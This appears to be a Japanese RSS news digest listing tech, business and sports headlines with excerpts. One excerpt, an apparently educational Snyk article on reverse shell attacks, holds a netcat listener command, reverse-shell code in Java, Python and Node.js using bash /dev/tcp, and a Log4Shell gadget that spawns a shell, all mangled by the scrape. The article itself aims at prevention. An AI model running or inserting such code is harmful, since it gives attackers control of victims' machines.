Posted: 2022-08-24 07:21:28 RSS feed digest for 2022-08-24 07:00 (24 items)

Category Site Article title / trending term Link URL Frequent terms, summary / search volume Date registered
IT ITmedia all articles [ITmedia Business Online] Tokyo's COVID cooperation subsidies: fraudulent claims exceed 300 million yen in total, 64 cases, largest 59 million yen https://www.itmedia.co.jp/business/articles/2208/23/news174.html itmedia 2022-08-24 06:30:00
IT ITmedia all articles [ITmedia Business Online] Stagnating company employees in their 50s: over 70% say "every day is boring". Why? https://www.itmedia.co.jp/business/articles/2208/23/news079.html itmedia 2022-08-24 06:30:00
IT ITmedia all articles [ITmedia Business Online] "Kinki's afterthought": why are flights to Wakayama gaining passengers? https://www.itmedia.co.jp/business/articles/2208/24/news048.html ITmedia Business Online: "Kinki's afterthought": why are flights to Wakayama gaining passengers? Wakayama Prefecture is now drawing keen attention. 2022-08-24 06:30:00
AWS AWS Partner Network (APN) Blog Designing a Multi-Tenant SFTP Server with AWS Transfer Family https://aws.amazon.com/blogs/apn/designing-a-multi-tenant-sftp-server-with-aws-transfer-family/ Designing a Multi-Tenant SFTP Server with AWS Transfer Family: Data security is a particularly important topic for multi-tenant SaaS applications that handle customers' sensitive data. How to securely segregate tenant data and how to provide data access to customers will vary depending on the SaaS solution's architecture and its requirements. This post explores how SaaS vendors can build secure, scalable and cost-effective data exchange mechanisms using SFTP (SSH File Transfer Protocol) with AWS managed services like AWS Transfer Family. 2022-08-23 21:42:41
python New posts tagged Python - Qiita [Python] Simulating Onmyo-za's 『廿弐匹目は毒蝮』 https://qiita.com/AnPanda/items/9e67c2a37efe25ea7fa6 Onmyo-za 2022-08-24 06:27:30
js New posts tagged JavaScript - Qiita [JavaScript] Data types and literals https://qiita.com/andota05/items/57563724656e4ada14dd javascrip 2022-08-24 06:55:52
AWS New posts tagged AWS - Qiita Hosting an existing React app on AWS Amplify https://qiita.com/thithi7110/items/8e70dcf3abe51436b629 github 2022-08-24 06:36:02
Git New posts tagged Git - Qiita A Linux command to create directories and files in one go https://qiita.com/ijufumi/items/eaf45dded5c1a86c1f17 mkdirpabcdeef 2022-08-24 06:51:30
Overseas tech Ars Technica Long-awaited Dead Island 2 reveal headlines Gamescom announcement frenzy https://arstechnica.com/?p=1875571 pokemon 2022-08-23 21:30:59
Overseas tech Ars Technica Scanning students' homes during remote testing is unconstitutional, judge says https://arstechnica.com/?p=1875691 illegal 2022-08-23 21:16:09
Overseas tech DEV Community How to format and enforce good practices in Cypress automation projects using the Eslint tool https://dev.to/joaocosti/eslint-em-projetos-de-cypress-o-que-e-e-quais-suas-vantagens-5765 How to format and enforce good practices in Cypress automation projects using the Eslint tool: In day-to-day test automation, or in any project where code is written, one of the main problems is ensuring quality, whether through good practices or a formatting standard. One way to ensure the quality of the automation is to review other people's code (code review), but that ends up being a costly process because it requires critical analysis and correction of problems. Luckily for us there is a tool we can use that already analyzes certain coding errors, formats the code according to the defined standard and, in the case of Cypress automation, shows in the code where there are bad test-automation practices. The tool I am referring to is Eslint. For explanatory purposes I created a repository on GitHub with the default scenarios provided by Cypress on the main branch. Then I installed Eslint on the eslint branch, following the Airbnb lint standards. Inside the package.json file I added two commands under scripts: "eslint": "eslint cypress" and "eslint:fix": "eslint cypress --fix". When running the command npm run eslint, only formatting or coding errors and warnings are shown in the terminal; for example, in the image below you can see an error in the file ee.js with the message semi, and at the start of the error you can find which line the error is on. The error shown says a semicolon is missing at the end of the code; in JavaScript this rule is not mandatory, but since I configured the Airbnb lint, it is mandatory. The problem with the command above is the tedium of adding it on every required line, or having to fix the spacing of each line according to the lint rules, but the good news is that the other command, npm run eslint:fix, already fixes the formatting and shows only the coding errors. When I say coding error, I mean a variable that is declared but never used, or an import of a file that does not exist. In the image below I ran the command mentioned earlier; compared with the previous figure the number of errors dropped, because the formatting problems were resolved. In the image above, Eslint reported an error warning about a problem with cy.wait; that is because I installed an extension that checks good practices for Cypress project code. By default this extension has the following rules: prevent assigning the return values of cy commands; avoid waiting with cy.wait; prevent the use of async/await in Cypress commands. It is possible to add other rules, for example to prevent force: true from being used in Cypress commands; to do so I added the rule "cypress/no-force": "error" in the rules section of the Eslint config file, so that once the Eslint command runs an error is shown for every command that uses force: true. Conclusion: With Eslint it is possible to find formatting and coding errors efficiently; this tool does not eliminate the need for code review, but it lets errors be found and fixed more efficiently. Links: the GitHub repository where I applied Eslint; the Cypress lint plugin; Eslint. 2022-08-23 21:40:00
Overseas tech DEV Community What is a reverse shell attack?! https://dev.to/snyk/taking-control-of-your-server-with-a-reverse-shell-attack-3mdg What is a reverse shell attack? Creating and running an application in your favorite language is usually pretty simple. After you create your application, deploying it and showing it to the world is also quite straightforward. The last thing you need is someone to take over your system and fully control your brand new application. In this article I'll explain how this can happen with a remote shell attack. Note that the code examples in this article are for educational purposes only. I mainly try to explain what a remote shell attack is and how it can occur in your applications. Using this or any other example to hack someone is not advised. In most countries, hacking without the consent of the target is illegal, even if you have the best intentions. What is a reverse shell? A reverse shell, or connect-back shell, is a shell session initiated by the target machine to a remote host. The target machine opens the session to a specific host and port. A shell connection can be created if the remote host listens on that port with the appropriate software. It's important to note that the initiation is done by the target machine, not the remote host. With a remote shell attack, an attacker tries to make the victim machine initiate such a connection. The attack can establish interactive shell access (basically a terminal) and take over the victim machine. How does a reverse shell attack happen? In most cases a reverse shell attack happens when an application is vulnerable to a remote code execution vulnerability. An attacker uses such a vulnerability in an application to execute some code on the victim's machine that initiates the shell session. Without knowing it, the victim creates a connection, and the attacker only has to listen for incoming connections on the correct port. Once the connection is established, the attacker has shell access to the victim and does all sorts of exciting things. Think of it like a tennis ball: if you throw it at something hard, it will come back at you; you only need to catch it at the right place and time. Making a reverse shell connection: To create a reverse shell you have multiple options depending on your language. However, before executing this reverse shell code we need to make sure that we listen on the correct port for incoming connections. Listening for incoming connections using netcat: A great tool to do this is netcat. Netcat, often abbreviated to nc, is a computer networking utility for reading from and writing to network connections using TCP or UDP. On the machine you want the reverse shell to connect to, you can use netcat to listen for incoming connections on a specific port. The example below shows how to make netcat listen on the port. Note that the -v parameter is not strictly needed, but it gives me a nice verbose output: nc -lvp <port>. Execute a reverse shell in Python, Java or Node.js: Let's discuss two approaches to setting up a reverse shell. Both examples are suitable for systems that have the bash shell installed. Method 1: Programmatically. The first method is a programmatic action where we start up a shell. Next we create a socket connection to the remote computer with the appropriate IP address and port. Lastly we connect the file descriptors (input, output and error) from the shell to the newly created socket connection. Java (code as it appears in the feed excerpt): public static void main String args throws IOException Process process new ProcessBuilder bash redirectErrorStream true start Socket socket new Socket InputStream pInput process getInputStream InputStream pError process getErrorStream InputStream sInput socket getInputStream OutputStream pOutput process getOutputStream OutputStream sOutput socket getOutputStream while socket isClosed while pInput available gt sOutput write pInput read while pError available gt sOutput write pError read while sInput available gt pOutput write sInput read sOutput flush pOutput flush. In this Java example we route the process's InputStream and ErrorStream to the OutputStream of the remote socket connection. We also need to do this the other way around and write the Socket OutputStream into the InputStream of the bash process. Python: import sys socket os pty s socket socket s connect os dup s fileno fd for fd in pty spawn bash. In this Python script we connect stdin, stdout and stderr to the socket connection. In Unix-like systems these are the first three file descriptors. Next we use pty to run bash. Node.js: var net require net var cp require child process var sh cp spawn bash var client new net Socket client connect function client pipe sh stdin sh stdout pipe client sh stderr pipe client. This Node.js example is very similar to the Python example: we run bash and connect the standard file descriptors appropriately to the socket connection. Method 2: Execute a shell command. The second method is a bit shorter. Most languages have a way to execute shell commands, like Runtime.getRuntime() in Java, os.system() in Python and require('child_process').exec() in Node.js. We can leverage these functions to call a one-liner shell command that initiates the reverse shell for us. Java: public static void main String args throws IOException String cmd bash c exec lt gt dev tcp cat lt amp while read line do line gt amp gt amp done Runtime getRuntime exec cmd. Python: import os os system bash c bash i lt gt dev tcp lt amp gt amp gt amp. Node.js: require child process exec bash c bash i lt gt dev tcp lt amp gt amp gt amp. When you first execute the netcat command listening on the port before executing this piece of code, you will notice that the connection is established and you can execute shell commands like the one below. You make a reverse shell connection to yourself with all of the above examples. If you want to do this to a remote machine you obviously need to change the IP address appropriately. Next, remember that even if you have access, the privilege depends on the user running this code on the victim's machine. To get elevated privileges you might need to do a bit more. Creating a reverse shell attack using a remote code execution vulnerability: To create an actual attack with code examples like this we need to leverage a code execution vulnerability and insert the code into an existing system. A great example is the Log4Shell vulnerability that was discovered in December. It was possible to insert a gadget class that executed code when it was instantiated. Many of the examples showed how to launch the calculator or something harmless. Nevertheless, the code below would create a gadget for this infamous Log4j vulnerability. By exploiting Log4Shell now you do not start up the calculator anymore but weaponize it into a reverse shell enabler: public class Evil implements ObjectFactory Override public Object getObjectInstance Object obj Name name Context nameCtx Hashtable lt gt environment throws Exception String cmd bin bash c exec lt gt dev tcp cat lt amp while read line do line gt amp gt amp done Runtime getRuntime exec cmd return null. Almost all remote code executions can be used to enable a reverse shell attack. Other recent examples were SpringShell and the Apache Commons Configuration RCE. Both examples were not as problematic as Log4Shell, but you can use either to create a reverse shell attack and possibly control a target machine. Therefore it's essential to prevent user input from being partially executed. How to prevent reverse shell attacks: If we can prevent an attacker from executing code on your machine, we eliminate almost all possibilities of a reverse shell attack. Let's look at some measures you can take as a developer to prevent malicious reverse shell attacks. Remove execution statements: statements in your code that can execute scripts or other pieces of code, like exec, should be avoided as much as possible. Sanitize and validate input: all input must be considered potentially malicious. This is not only direct user input; for instance, when a database field is the input of an execution, somebody can try to attack the database. Run your application with limited privileges: don't run your application as root, but create a user with the least privileges needed. This unfortunately happens a lot with applications in Docker containers, as the default user in a Docker container is root. Prevent vulnerabilities that enable remote code execution: if a library or framework is compromised, replace it with a secure version. Almost all remote code executions can be used for a reverse shell attack, even if the use case looks far-fetched. Snyk can help: Snyk is a helpful tool for preventing reverse shell attacks by scanning code and dependencies. It points out potential security mistakes in your custom code and scans your dependencies for known vulnerabilities. Sign up for Snyk's free tier to start scanning. 2022-08-23 21:18:12
Overseas tech Engadget Twitter whistleblower claims company's practices pose national security risk https://www.engadget.com/twitter-whistleblower-national-security-china-russia-india-213558380.html?src=rss Twitter whistleblower claims company's practices pose national security risk: In a whistleblower complaint, Twitter's former security chief has raised serious questions not just about the company's security practices, but about the potential for foreign governments and entities to influence the company. According to Peiter "Mudge" Zatko, Twitter's dealings with other countries could be putting the United States' national security at risk. As reported by CNN, the complaint details specific concerns relating to Russia, China and India. "A few months before CTO Parag Agrawal was promoted to CEO, Agrawal suggested to Mudge that Twitter should consider ceding to the Russian Federation's censorship and surveillance demands as a way to grow users in Russia," the complaint, published by The Washington Post, states. The document doesn't specify what steps Agrawal proposed. As CNN points out, Russia tried to force large tech companies, including Twitter, to open local offices in the country before its invasion of Ukraine. The complaint states that the "suggestion was never pursued or implemented," but it notes that the mere suggestion is "cause for concern about Twitter's effects on U.S. national security" and that it was at odds with Jack Dorsey's wishes. Zatko also raises questions about Twitter's financial relationship with unnamed "Chinese entities." The complaint states that Twitter is "dependent upon revenue coming from Chinese entities" even though the Twitter service is blocked in China. The money led to "concerns within Twitter that the information the Chinese entities could receive would allow them to identify and learn sensitive information about Chinese users who successfully circumvented the block, and other users around the world." It goes on to say that "Mr. Zatko was told that Twitter was too dependent on the revenue stream to do anything other than attempt to increase it." Regarding Twitter's operations in India, the complaint alleges that the Indian government "forced the company to hire at least one government agent" who "would have access to vast amounts of Twitter's sensitive data." It later says that a U.S. government source warned the company that "one or more particular company employees were working on behalf of another particular foreign intelligence agency." The document doesn't specify what country the source was referring to. Notably, it's not the first time Twitter has dealt with an employee accused of spying for another country. A former Twitter worker was recently convicted of acting as an agent for Saudi Arabia. Prosecutors alleged the man was paid to turn over sensitive information about dissidents. Elsewhere in the complaint, Zatko states that Twitter repeatedly caught employees "intentionally installing spyware on their work computers at the request of external organizations," even though it was against the company's policy to do so. There are no further details provided about what organizations might be making such requests or why employees would comply, but the complaint notes that as a result some "external people or organizations had more awareness of activity on some Twitter employee computers than Twitter itself had." Twitter didn't immediately respond to a request for comment on the claims. The company previously told The Washington Post and CNN the complaint was "riddled with inaccuracies." Members of Congress, including the Senate Intelligence Committee, have already said they are looking into Zatko's allegations. 2022-08-23 21:35:58
Overseas tech Engadget NPR's podcast catalog comes to YouTube https://www.engadget.com/npr-podcasts-youtube-212505567.html?src=rss NPR's podcast catalog comes to YouTube: Google is partnering with National Public Radio to bring the broadcaster's podcasts to YouTube. On Thursday the two announced that more than [number] NPR shows, including Up First and Throughline, are now available on the platform. NPR is no stranger to YouTube: its Tiny Desk concert series has been a hit on the platform for a few years now, with a recent Ludovico Einaudi performance amassing nearly [number] views and counting. The addition of NPR podcasts comes just as YouTube recently added an Explore page dedicated to the format. While it's only available to some people, the section highlights popular channels, episodes and playlists, as well as categories and recommended shows. It may not explicitly market itself as a podcast platform, but both the page and its new partnership with NPR show YouTube getting serious about the medium. 2022-08-23 21:25:05
Overseas tech Engadget Yelp adds a warning label to anti-abortion center listings https://www.engadget.com/yelp-crisis-pregnancy-center-label-will-make-them-more-distinct-from-abortion-clinics-210351828.html?src=rss Yelp adds a warning label to anti-abortion center listings: Starting today, Yelp will apply a label to business pages for crisis pregnancy centers, also known as anti-abortion centers, to clarify that these facilities usually have limited medical services. The label also notes that crisis pregnancy centers may not have licensed medical professionals on site. The consumer notice could help people avoid confusion with clinics that offer abortion services. In a blog post, Yelp said it was making the change following the US Supreme Court's decision in June to overturn Roe v. Wade, a ruling that conferred a nationwide right to safe abortion access for nearly [number] years. "The trust and safety of our community is a top priority, which is why providing consumers with reliable and useful information to help inform their decisions is critical to our mission; this includes access to reliable information about reproductive health services," Yelp wrote. Many crisis pregnancy centers have religious affiliations, as the Associated Press previously reported. Some are said to provide misleading information about abortion and contraception. Yelp has reviewed tens of thousands of business listings since [year] with the aim of ensuring crisis pregnancy centers are differentiated from abortion clinics. It noted that moderators have reclassified almost [number] businesses as crisis pregnancy centers or faith-based crisis pregnancy centers this year alone in the US, after reviewing nearly [number] business pages. It plans to review more than [number] business pages across the US, Canada and Puerto Rico in the coming months. This is an issue that other tech companies have been contending with. Last week the Alphabet Workers Union demanded that Google address misleading search results related to abortion services by removing results for fake abortion providers. Democratic lawmakers have asked Google to stop directing people seeking an abortion to anti-abortion facilities, while some Republican attorneys general warned the company not to limit such centers from appearing in search results. In early July, Google said it would delete abortion clinic visits from user location histories. 2022-08-23 21:03:51
Overseas science NYT > Science Webb Telescope's New Jupiter Images and an Expanded Universe https://www.nytimes.com/2022/08/23/science/james-webb-telescope-jupiter-galaxies.html Webb Telescope's New Jupiter Images and an Expanded Universe: As new images of Jupiter and a galactic survey spring forth from NASA's new observatory, our cosmic affairs correspondent confesses he didn't anticipate their power. 2022-08-23 21:48:07
Finance News - 保険市場TIMES Japan Post Insurance is holding "Sukoyaka Ouen!! Chiikawa to Issho ~Serial Collaboration Project~" https://www.hokende.com/news/blog/entry/2022/08/24/070000 Japan Post Insurance is holding "Sukoyaka Ouen!! Chiikawa to Issho ~Serial Collaboration Project~": The hugely popular character "Chiikawa" appears at post offices. Japan Post Insurance Co., Ltd. (hereafter Japan Post Insurance) is holding the "Sukoyaka Ouen!! Chiikawa to Issho ~Serial Collaboration Project~" until [date]. 2022-08-24 07:00:00
News BBC News - Home Crawley Town 2-0 Fulham: League Two hosts beat Premier League visitors https://www.bbc.co.uk/sport/football/62558160?at_medium=RSS&at_campaign=KARANGA crawley 2022-08-23 21:55:17
News BBC News - Home Stockport County 0-0 Leicester City (1-3 on pens): Foxes edge past League Two side https://www.bbc.co.uk/sport/football/62558106?at_medium=RSS&at_campaign=KARANGA Stockport County 0-0 Leicester City (1-3 on pens): Foxes edge past League Two side. Leicester keeper Daniel Iversen saves three penalties to earn the Foxes a tense Carabao Cup shootout win against Stockport County. 2022-08-23 21:35:34
Hokkaido Hokkaido Shimbun Former security chief blows the whistle on Twitter's lack of security https://www.hokkaido-np.co.jp/article/721253/ posting site 2022-08-24 06:22:00
Hokkaido Hokkaido Shimbun Finnish prime minister apologizes; this time over a party at the official residence https://www.hokkaido-np.co.jp/article/721252/ apology 2022-08-24 06:22:00
Hokkaido Hokkaido Shimbun People with disabilities feel both accomplishment and indignation as the UN's review of the Japanese government ends https://www.hokkaido-np.co.jp/article/721251/ Japanese government 2022-08-24 06:22:00
Hokkaido Hokkaido Shimbun Iyotetsu's "Tart Train" departs, promoting Matsuyama's signature confection https://www.hokkaido-np.co.jp/article/721250/ Iyotetsu Group 2022-08-24 06:12:00
Business Toyo Keizai Online Is there a way to protect railways from weather disasters? Torrential rain hit Tohoku; can Kyushu's example teach us anything? | Local lines / public transport | Toyo Keizai Online https://toyokeizai.net/articles/-/611696?utm_source=rss&utm_medium=http&utm_campaign=link_back large typhoon 2022-08-24 06:30:00
